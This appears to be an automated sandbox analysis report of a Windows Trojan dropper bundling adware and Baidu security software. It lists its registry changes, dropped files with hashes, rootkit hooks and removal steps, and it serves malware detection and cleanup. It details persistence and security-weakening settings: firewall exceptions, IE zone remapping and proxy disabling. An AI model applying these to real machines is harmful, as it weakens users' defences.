"BaiduAnBugRpt.exe" = "%Program Files%\Baidu\BaiduAn\2.3.0.2225\BaiduAnBugRpt.exe:*:Enabled:百度å«士BUG上报程åºÂÂ"
Adds a rule to the firewall Windows which allows any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\Baidu\BaiduAn\2.3.0.2225]
"BaiduAnUpdate.exe" = "%Program Files%\Baidu\BaiduAn\2.3.0.2225\BaiduAnUpdate.exe:*:Enabled:百度å«士更新程åºÂÂ"
The following service will be launched automatically at system boot up:
[HKLM\System\CurrentControlSet\Services\BDArKit]
"Start" = "2"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The following driver will be automatically launched by the NT Native code (IoInitSystem method):
[HKLM\System\CurrentControlSet\Services\bd0002]
"Start" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The following driver will be automatically launched by the NT Native code (IoInitSystem method):
[HKLM\System\CurrentControlSet\Services\bd0001]
"Start" = "1"
Adds a rule to the firewall Windows which allows any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp]
"snczjmr.dll" = "%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\snczjmr.dll:*:Enabled:百度å«士安装程åºÂÂ"
The Trojan adds process executable file it works in to the list of trusted Windows Firewall applications:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Program Files%\Baidu\BaiduAn\2.3.0.2225]
"BaiduAnTray.exe" = "%Program Files%\Baidu\BaiduAn\2.3.0.2225\BaiduAnTray.exe:*:Enabled:百度å«士托盘程åºÂÂ"
Adds a rule to the firewall Windows which allows any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\Baidu\BaiduAn\2.3.0.2225]
"BaiduAnBugRpt.exe" = "%Program Files%\Baidu\BaiduAn\2.3.0.2225\BaiduAnBugRpt.exe:*:Enabled:百度å«士BUG上报程åºÂÂ"
The Trojan deletes the following value(s) in system registry:
[HKLM\System\CurrentControlSet\Services\BDMNetMon]
"DeleteFlag"
[HKLM\System\CurrentControlSet\Services\bd0001]
"DeleteFlag"
[HKLM\System\CurrentControlSet\Services\bd0002]
"DeleteFlag"
[HKLM\SOFTWARE\Baidu\BaiduAn]
"RtpFlag"
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\updatr]
"oovmdw_70745.exe"
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Program Files%\updatr]
"oovmdw_70745.exe"
[HKLM\System\CurrentControlSet\Services\BDArKit]
"DeleteFlag"
The process BDASWAcc.exe:316 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "35 F2 B3 4A 22 64 87 3D B8 BF F0 70 A0 30 88 25"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process Ainqngz5.2.exe:1136 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "Ainqngz5.2.exe"
[HKLM\SOFTWARE\Microsoft\Direct3D\MostRecentApplication]
"Name" = "Ainqngz5.2.exe"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1404720818"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8C E4 B1 42 81 58 CC A4 3D CE 21 29 9B 67 20 D5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
MD5 | File path |
---|---|
254f13dfd61c5b7d2119eb2550491e1d | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsi3.tmp\NSISdl.dll |
00a0194c20ee912257df53bfe258ee4a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsi3.tmp\System.dll |
f951a17f9892add6be51b7f84638defe | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsi3.tmp\guagua_77150006814.exe |
2e02c1bdb46273ef13cb5203576e079f | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsi3.tmp\pczh_107_306.exe |
44edff85d12e091f0b129f05a3f2a042 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsw6.tmp\BDLogicUtils.dll |
d184763cb4e62d531193978de7b82db2 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsw6.tmp\BDMDownload.dll |
c8b0dca29d7b9aff1b801af86212c586 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsw6.tmp\BDMNet.dll |
12f98be1d919784370eb0f87e78b60d8 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsw6.tmp\BDMNetGetInfo.dll |
30cbc602ada7cdfb0346038c05996d84 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsw6.tmp\BDMReport.dll |
b540a866191f7fd20f5e6355bc2b094e | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsw6.tmp\BDMSkin.dll |
f52eb281e29da8065e18805617ac2cbc | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsw6.tmp\System.dll |
763b532d651f0ad5e135d9b57bf4fba4 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsw6.tmp\dl.dll |
ebfe7c9594e300bb0c16e7bb99a7e66d | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsw6.tmp\hu.dll |
731e4fd7cbbff12adebb2a4ff8fbe9eb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsw6.tmp\tmpjnmhqw.dll |
8d6d78fcc0a17b47f17ce77217ef53a1 | c:\Program Files\ainqngz5.2\Ainqngz5.2.exe |
151ff53109c38e720e9083e3a4e194f8 | c:\Program Files\ainqngz5.2\candid.exe |
61dd64b3a469bdcd80a69e8fc084d240 | c:\Program Files\ainqngz5.2\schedule.exe |
b975774b4cabf39685edf11b68b81dbe | c:\Program Files\ainqngz5.2\uninstall.exe |
f06fb28d3a6db3fbd7e462bb6322af56 | c:\Program Files\updatr\oovmdw_70745.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
Using the driver "%System%\DRIVERS\bd0001.sys" the Trojan controls creation and closing of processes by installing the process notifier.
Using the driver "%System%\DRIVERS\BDMNetMon.sys" the Trojan controls creation and closing of processes by installing the process notifier.
Using the driver "%System%\DRIVERS\bd0001.sys" the Trojan controls creation and closing of threads by installing the thread notifier.
Using the driver "%System%\DRIVERS\bd0001.sys" the Trojan controls loading executable images into a memory by installing the Load image notifier.
The Trojan installs the following kernel-mode hooks:
ZwUnloadKey
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
wwwww_3340.exe:3720
vcredist_x86.exe:2720
netsh.exe:3112
bddownloader.exe:2984
guagua_77150006814.exe:1016
sc.exe:1336
sc.exe:644
BDDownloader.exe:2084
BDDownloader.exe:2804
MsiExec.exe:3196
candid.exe:1548
pczh_107_306.exe:828
baiduanTray.exe:2772
spkjrjp_30279.exe:1632
yymusic05.exe:2308
regsvr32.exe:3184
BDALeakfixer.exe:3640
BaiduAn.exe:3516
BaiduAn.exe:3208
BaiduAnSvc.exe:3884
BaiduAnSvc.exe:3732
oovmdw_70745.exe:444
BDASWAcc.exe:316 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Start Menu\Programs\yyfm0529\yyfm0529.lnk (840 bytes)
%Program Files%\yyfm0529\2014081705\Data\version.ini (32 bytes)
%Program Files%\yyfm0529\2014081705\swresample-0.dll (3312 bytes)
%Program Files%\yyfm0529\2014081705\Data\user2.ini (40 bytes)
%Program Files%\yyfm0529\2014081705\yymusic05.exe (63950 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\yyfm0529\¹Ù·½Ö÷Ò³.lnk (334 bytes)
%Program Files%\yyfm0529\2014081705\audio.dll (3616 bytes)
%Program Files%\yyfm0529\2014081705\pthreadGC2.dll (3616 bytes)
%Program Files%\yyfm0529\2014081705\avutil-52.dll (5520 bytes)
%Program Files%\yyfm0529\2014081705\Data\client.ini (36 bytes)
%Program Files%\yyfm0529\2014081705\favorfm.xml (440 bytes)
%Program Files%\yyfm0529\2014081705\DuiLib.dll (16288 bytes)
%Program Files%\yyfm0529\2014081705\Data\setup.ini (110 bytes)
%Program Files%\yyfm0529\2014081705\Data\dh.ini (56 bytes)
%Program Files%\yyfm0529\2014081705\channels.xml (784 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\yyfm0529\ÅäÖù¤¾ß\öÃâ€ÂØyyfm0529.lnk (830 bytes)
%Program Files%\yyfm0529\2014081705\libav.dll (6360 bytes)
%Program Files%\yyfm0529\2014081705\Unins.exe (9608 bytes)
%Program Files%\yyfm0529\2014081705\YFMSever.exe (23936 bytes)
%Program Files%\yyfm0529\2014081705\avcore.dll (2392 bytes)
%Program Files%\yyfm0529\2014081705\avcodec-54.dll (23936 bytes)
%Program Files%\yyfm0529\2014081705\source.dll (6584 bytes)
%Program Files%\yyfm0529\2014081705\SysConfig.ini (256 bytes)
%Program Files%\yyfm0529\2014081705\avformat-54.dll (12536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\vcredis1.cab (6255 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\vcredist.msi (42423 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\BDMWrench.sys.tmp.bdl (6441 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\dnw.xml.tmp.bdl (241 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\NSISdl.dll (14 bytes)
%Program Files%\updatr\tj.txt (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst2.tmp (57025 bytes)
%Program Files%\updatr\oovmdw_70745.exe (51840 bytes)
%Program Files%\updatr\uboskin\config.ini (290 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\pczh_107_306.exe (57056 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\adwoca_00005.exe (4626 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\wwwww_3340.exe (413400 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\spkjrjp_30279.exe (230878 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\guagua_77150006814.exe (106373 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\sha (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\cb16fabc\DMSet.Xml (675 bytes)
%Program Files%\Common Files\Baidu\BDDownload\107\bddownloader.exe (9605 bytes)
%Program Files%\Common Files\Baidu\BDDownload\107\7z.dll (2105 bytes)
%Program Files%\Common Files\Baidu\BDDownload\107\dl.dll (14988 bytes)
%Program Files%\Common Files\Baidu\BDDownload\107\bdcomproxy.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\BDDownloader_Installer\1.0.107.0[2014-8-17-5-21-45]\bdcomproxy.dll (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst12.tmp (86466 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\BDDownloader_Installer\1.0.107.0[2014-8-17-5-21-45]\bddownloader.exe (41699 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\BDDownloader_Installer\1.0.107.0[2014-8-17-5-21-45]\dl.dll (65930 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\dl.dll (65930 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\BDDownloader_Installer\1.0.107.0[2014-8-17-5-21-45]\7z.dll (12536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi13.tmp\System.dll (784 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\°®Çé.ÖÇ»Û.5.2\öÃâ€ÂØ.lnk (715 bytes)
%Program Files%\ainqngz5.2\candid.exe (5520 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\°®Çé.ÖÇ»Û.5.2\°®Çé.ÖÇ»Û.5.2.lnk (720 bytes)
%Program Files%\ainqngz5.2\uninstall.exe (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd8.tmp (19409 bytes)
%Program Files%\ainqngz5.2\Ainqngz5.2.exe (4992 bytes)
%Program Files%\ainqngz5.2\schedule.exe (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd9.tmp\NSISdl.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd9.tmp\nsA.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd9.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd9.tmp\nsB.tmp (6 bytes)
%Documents and Settings%\%current user%\Desktop\°®Çé.ÖÇ»Û.5.2.lnk (708 bytes)
%Documents and Settings%\%current user%\Templates\172014852040460\YYM_955WD30.gif (1134 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd9.tmp\nsExec.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd9.tmp\Base64.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw1A.tmp\hu.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw1A.tmp\BDLogicUtils.dll (30968 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw1A.tmp\BDMSkin.dll (38495 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh19.tmp (166951 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw1A.tmp\BDMDownload.dll (5520 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw1A.tmp\BDMNetGetInfo.dll (9608 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw1A.tmp\tmpt5zprs.dll (95827 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw1A.tmp\dl.dll (65930 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw1A.tmp\res\onlineWnd.zip (6360 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\a[1].htm (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\stj[1].ashx (3 bytes)
%Program Files%\yyfm0529\2014081705\Data\server.ini (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\tj[1].ashx (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\ver[1].txt (36 bytes)
%WinDir%\Temp\Cab16.tmp (54 bytes)
%System%\config\SYSTEM.LOG (7714 bytes)
%System%\config\software (95028 bytes)
%System%\config\SOFTWARE.LOG (76196 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\white_list.db (145 bytes)
%System%\config\systemprofile\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (408 bytes)
%WinDir%\Temp\Cab14.tmp (54 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\white_list.db-journal (512 bytes)
%WinDir%\Temp\Tar17.tmp (2712 bytes)
%System%\config\systemprofile\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (18 bytes)
%System%\drivers\BDEnhanceBoost.sys (48 bytes)
%System%\drivers\BDMWrench.sys (1346 bytes)
C:\$Directory (576 bytes)
%WinDir%\Temp\Tar15.tmp (2712 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BaiduAnTray.exe (9606 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmsusplugins\BDMNetMonSusPlugin.dll (3721 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDSWShellExt.dll (1720 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\RTPPlugins\BDMSOAccServicePlugin.dll (1859 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\bdmantivirus\BDMRepBase.dll (3897 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\sd\FileMon.dll (7972 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\KVCommonRes.rdb (109 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\SysFixer.rdb (87 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMSWNestCore.dll (6428 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\BDMTray.rdb (20 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\百度å«士\百度å«士.lnk (823 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\Patch\publish.db (32763 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\vcredist_x86.exe (17629 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmsafeplugins\BDMSysFixerPlugin.dll (5442 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddlp.bca (40 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\804.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\BDMNetGetInfo.dll (11344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\BDMSkin.dll (36698 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\BDMNetMon_XP_x86.sys (601 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\ad.dll (6379 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\bdmantivirus\scan_mgr_config.dat (2 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BaiduAnBugRpt.exe (6437 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDNetMisc.dll (67 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDLogicUtils.dll (3811 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMStringUtils.dll (66 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BaiduAnUpdate.exe (7972 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\SysOptDict.dat (4 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmsusplugins\SusPluginContainerConfig.xml (605 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSWManager\sw_property.dat (267 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\x86\BDMNetMon_WIN7_x86.sys (94 bytes)
%System%\drivers\BDMNetMon.sys (601 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\SOHomePageCleanerConfig.dat (12 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\BDMUpdate.rdb (1630 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\BDMDownload.dll (5520 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\SOSilentCleanerConfig.dat (12 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\x86\BDArKit.sys (91 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\SysAccLiveStrategy.dat (93 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers_back (4 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\app.ico (1623 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmtrayplugins\BDMSusPlugin.dll (3745 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDKVLogs.dll (7386 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\SOGarbageCleanerConfig.dat (12 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSWManager\sw_acc.dat (3 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmmainframeplugins\PluginSetup.xml (1 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\SysRepLib.dat (22 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\Common\Global.db (100 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\NetService.ini (590 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\SOPluginCleanerConfig.dat (442 bytes)
